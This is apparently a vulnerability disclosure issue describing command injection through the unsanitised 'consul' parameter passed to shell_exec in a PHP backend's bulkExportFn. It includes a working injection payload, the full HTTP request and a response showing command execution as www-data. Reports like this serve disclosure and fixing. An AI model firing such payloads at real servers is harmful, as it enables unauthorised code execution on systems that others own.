Command Injection on bulkExportFn function #30
Description
I identified the possibility of injecting commands when calling the EXPORT method due to the bulkExportFn function using the shell_exec call concatenating the value of $consul without any sanitization. Therefore, by using the echo command to return JSON in the format expected by the function, it is possible to obtain the result of executing the command.
Endpoint: /backend/requests.php
Payload: consul=;x=id | base64 -w0; echo "[{"LockIndex":0,"key":"Test","Flags":0,"value":"$x","CreateIndex":10522112,"ModifyIndex":10522112}]" #&method=EXPORT&path=%5B%22Test%22%5D
-- Full request --
POST /backend/requests.php HTTP/1.1
Host: {IP}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 189
Connection: close
Cookie: PHPSESSID={TOKEN}
consul=;x=id | base64 -w0; echo "[{"LockIndex":0,"key":"Test","Flags":0,"value":"$x","CreateIndex":10522112,"ModifyIndex":10522112}]" #&method=EXPORT&path=%5B%22Test%22%5D
-- Response --
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 65
Connection: close
Content-Type: text/html; charset=UTF-8
{"Test":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"}